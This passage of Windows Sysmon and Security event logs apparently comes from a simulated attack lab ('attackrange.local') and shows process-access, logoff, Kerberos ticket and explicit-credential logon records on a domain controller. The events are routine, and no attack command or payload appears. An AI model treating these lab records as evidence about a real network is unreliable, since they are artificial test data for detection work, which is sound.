C:\\Windows\\system32\\svchost.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+11c6e|C:\\Windows\\system32\\lsasrv.dll+1e0a8|C:\\Windows\\system32\\lsasrv.dll+1d2d1|C:\\Windows\\system32\\lsasrv.dll+1bb00|C:\\Windows\\system32\\lsasrv.dll+2810b|C:\\Windows\\SYSTEM32\\SspiSrv.dll+1467|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:52:42.593","SourceProcessGUID":"{A837DB8D-01B3-5F25-0000-001001540000}","SourceProcessId":"864","SourceThreadId":"2800","SourceImage":"C:\\Windows\\system32\\lsass.exe","TargetProcessGUID":"{A837DB8D-01B5-5F25-0000-0010FACE0000}","TargetProcessId":"1332","TargetImage":"C:\\Windows\\system32\\svchost.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+11c6e|C:\\Windows\\system32\\lsasrv.dll+1e0a8|C:\\Windows\\system32\\lsasrv.dll+1d2d1|C:\\Windows\\system32\\lsasrv.dll+1bb00|C:\\Windows\\system32\\lsasrv.dll+2810b|C:\\Windows\\SYSTEM32\\SspiSrv.dll+1467|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:52:43","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:42","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5114,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:42.593\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:52:42.593","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:52:43","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:42","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5115,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:42.593\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:52:42.593","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:52:43","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:42","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5116,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:42.593\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:52:42.593","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:52:43","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:42","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5117,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:42.593\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:52:42.593","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:52:43","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:42","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5118,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:42.593\r\nSourceProcessGUID: {A837DB8D-032A-5F25-0000-001044BF0900}\r\nSourceProcessId: 4892\r\nSourceThreadId: 4592\r\nSourceImage: C:\\Windows\\system32\\conhost.exe\r\nTargetProcessGUID: {A837DB8D-032A-5F25-0000-0010ECD90900}\r\nTargetProcessId: 4188\r\nTargetImage: C:\\Windows\\system32\\chcp.com\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:52:42.593","SourceProcessGUID":"{A837DB8D-032A-5F25-0000-001044BF0900}","SourceProcessId":"4892","SourceThreadId":"4592","SourceImage":"C:\\Windows\\system32\\conhost.exe","TargetProcessGUID":"{A837DB8D-032A-5F25-0000-0010ECD90900}","TargetProcessId":"4188","TargetImage":"C:\\Windows\\system32\\chcp.com","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:52:43","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:42","Hostname":"win-dc-881393.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4634,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":0,"Task":12545,"OpcodeValue":0,"RecordNumber":220573,"ProcessID":864,"ThreadID":2800,"Channel":"Security","Message":"An account was logged off.\r\n\r\nSubject:\r\n\tSecurity ID:\t\tS-1-5-21-1117747729-287425051-3091891954-500\r\n\tAccount Name:\t\tAdministrator\r\n\tAccount Domain:\t\tATTACKRANGE\r\n\tLogon ID:\t\t0x79AE1\r\n\r\nLogon Type:\t\t\t3\r\n\r\nThis event is generated when a logon session is destroyed. It may be positively correlated with a logon event using the Logon ID value. Logon IDs are only unique between reboots on the same computer.","Category":"Logoff","Opcode":"Info","TargetUserSid":"S-1-5-21-1117747729-287425051-3091891954-500","TargetUserName":"Administrator","TargetDomainName":"ATTACKRANGE","TargetLogonId":"0x79ae1","LogonType":"3","EventReceivedTime":"2020-08-01 05:52:44","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:42","Hostname":"win-dc-881393.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4634,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":0,"Task":12545,"OpcodeValue":0,"RecordNumber":220574,"ProcessID":864,"ThreadID":2800,"Channel":"Security","Message":"An account was logged off.\r\n\r\nSubject:\r\n\tSecurity ID:\t\tS-1-5-21-1117747729-287425051-3091891954-500\r\n\tAccount Name:\t\tAdministrator\r\n\tAccount Domain:\t\tATTACKRANGE\r\n\tLogon ID:\t\t0x7B258\r\n\r\nLogon Type:\t\t\t3\r\n\r\nThis event is generated when a logon session is destroyed. It may be positively correlated with a logon event using the Logon ID value. Logon IDs are only unique between reboots on the same computer.","Category":"Logoff","Opcode":"Info","TargetUserSid":"S-1-5-21-1117747729-287425051-3091891954-500","TargetUserName":"Administrator","TargetDomainName":"ATTACKRANGE","TargetLogonId":"0x7b258","LogonType":"3","EventReceivedTime":"2020-08-01 05:52:44","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:42","Hostname":"win-dc-881393.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4634,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":0,"Task":12545,"OpcodeValue":0,"RecordNumber":220575,"ProcessID":864,"ThreadID":4072,"Channel":"Security","Message":"An account was logged off.\r\n\r\nSubject:\r\n\tSecurity ID:\t\tS-1-5-21-1117747729-287425051-3091891954-500\r\n\tAccount Name:\t\tAdministrator\r\n\tAccount Domain:\t\tATTACKRANGE\r\n\tLogon ID:\t\t0x7BF72\r\n\r\nLogon Type:\t\t\t3\r\n\r\nThis event is generated when a logon session is destroyed. It may be positively correlated with a logon event using the Logon ID value. Logon IDs are only unique between reboots on the same computer.","Category":"Logoff","Opcode":"Info","TargetUserSid":"S-1-5-21-1117747729-287425051-3091891954-500","TargetUserName":"Administrator","TargetDomainName":"ATTACKRANGE","TargetLogonId":"0x7bf72","LogonType":"3","EventReceivedTime":"2020-08-01 05:52:44","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:42","Hostname":"win-dc-881393.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4768,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":0,"Task":14339,"OpcodeValue":0,"RecordNumber":220576,"ProcessID":864,"ThreadID":2800,"Channel":"Security","Message":"A Kerberos authentication ticket (TGT) was requested.\r\n\r\nAccount Information:\r\n\tAccount Name:\t\tAdministrator\r\n\tSupplied Realm Name:\tATTACKRANGE\r\n\tUser ID:\t\t\tS-1-5-21-1117747729-287425051-3091891954-500\r\n\r\nService Information:\r\n\tService Name:\t\tkrbtgt\r\n\tService ID:\t\tS-1-5-21-1117747729-287425051-3091891954-502\r\n\r\nNetwork Information:\r\n\tClient Address:\t\t::1\r\n\tClient Port:\t\t0\r\n\r\nAdditional Information:\r\n\tTicket Options:\t\t0x40810010\r\n\tResult Code:\t\t0x0\r\n\tTicket Encryption Type:\t0x12\r\n\tPre-Authentication Type:\t2\r\n\r\nCertificate Information:\r\n\tCertificate Issuer Name:\t\t\r\n\tCertificate Serial Number:\t\r\n\tCertificate Thumbprint:\t\t\r\n\r\nCertificate information is only provided if a certificate was used for pre-authentication.\r\n\r\nPre-authentication types, ticket options, encryption types and result codes are defined in RFC 4120.","Category":"Kerberos Authentication Service","Opcode":"Info","TargetUserName":"Administrator","TargetDomainName":"ATTACKRANGE","TargetSid":"S-1-5-21-1117747729-287425051-3091891954-500","ServiceName":"krbtgt","ServiceSid":"S-1-5-21-1117747729-287425051-3091891954-502","TicketOptions":"0x40810010","Status":"0x0","TicketEncryptionType":"0x12","PreAuthType":"2","IpAddress":"::1","IpPort":"0","EventReceivedTime":"2020-08-01 05:52:44","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:42","Hostname":"win-dc-881393.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4769,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":0,"Task":14337,"OpcodeValue":0,"RecordNumber":220577,"ProcessID":864,"ThreadID":2800,"Channel":"Security","Message":"A Kerberos service ticket was requested.\r\n\r\nAccount Information:\r\n\tAccount Name:\t\tAdministrator@ATTACKRANGE.LOCAL\r\n\tAccount Domain:\t\tATTACKRANGE.LOCAL\r\n\tLogon GUID:\t\t{E99C09B0-296B-B0EB-C315-DEAAFD061455}\r\n\r\nService Information:\r\n\tService Name:\t\tWIN-DC-881393$\r\n\tService ID:\t\tS-1-5-21-1117747729-287425051-3091891954-1008\r\n\r\nNetwork Information:\r\n\tClient Address:\t\t::1\r\n\tClient Port:\t\t0\r\n\r\nAdditional Information:\r\n\tTicket Options:\t\t0x40810000\r\n\tTicket Encryption Type:\t0x12\r\n\tFailure Code:\t\t0x0\r\n\tTransited Services:\t-\r\n\r\nThis event is generated every time access is requested to a resource such as a computer or a Windows service.  The service name indicates the resource to which access was requested.\r\n\r\nThis event can be correlated with Windows logon events by comparing the Logon GUID fields in each event.  The logon event occurs on the machine that was accessed, which is often a different machine than the domain controller which issued the service ticket.\r\n\r\nTicket options, encryption types, and failure codes are defined in RFC 4120.","Category":"Kerberos Service Ticket Operations","Opcode":"Info","TargetUserName":"Administrator@ATTACKRANGE.LOCAL","TargetDomainName":"ATTACKRANGE.LOCAL","ServiceName":"WIN-DC-881393$","ServiceSid":"S-1-5-21-1117747729-287425051-3091891954-1008","TicketOptions":"0x40810000","TicketEncryptionType":"0x12","IpAddress":"::1","IpPort":"0","Status":"0x0","LogonGuid":"{E99C09B0-296B-B0EB-C315-DEAAFD061455}","TransmittedServices":"-","EventReceivedTime":"2020-08-01 05:52:44","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:42","Hostname":"win-dc-881393.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4648,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":0,"Task":12544,"OpcodeValue":0,"RecordNumber":220578,"ActivityID":"{16791790-67C7-0001-9217-7916C767D601}","ProcessID":864,"ThreadID":2800,"Channel":"Security","Message":"A logon was attempted using explicit credentials.\r\n\r\nSubject:\r\n\tSecurity ID:\t\tS-1-5-20\r\n\tAccount Name:\t\tWIN-DC-881393$\r\n\tAccount Domain:\t\tATTACKRANGE\r\n\tLogon ID:\t\t0x3E4\r\n\tLogon GUID:\t\t{00000000-0000-0000-0000-000000000000}\r\n\r\nAccount Whose Credentials Were Used:\r\n\tAccount Name:\t\tAdministrator\r\n\tAccount Domain:\t\tATTACKRANGE\r\n\tLogon GUID:\t\t{E99C09B0-296B-B0EB-C315-DEAAFD061455}\r\n\r\nTarget Server:\r\n\tTarget Server Name:\tlocalhost\r\n\tAdditional Information:\tlocalhost\r\n\r\nProcess Information:\r\n\tProcess ID:\t\t0x534\r\n\tProcess Name:\t\tC:\\Windows\\System32\\svchost.exe\r\n\r\nNetwork Information:\r\n\tNetwork Address:\t-\r\n\tPort:\t\t\t-\r\n\r\nThis event is generated when a process attempts to log on an account by explicitly specifying that account’s credentials.  This most commonly occurs in batch-type configurations such as scheduled tasks, or when using the RUNAS 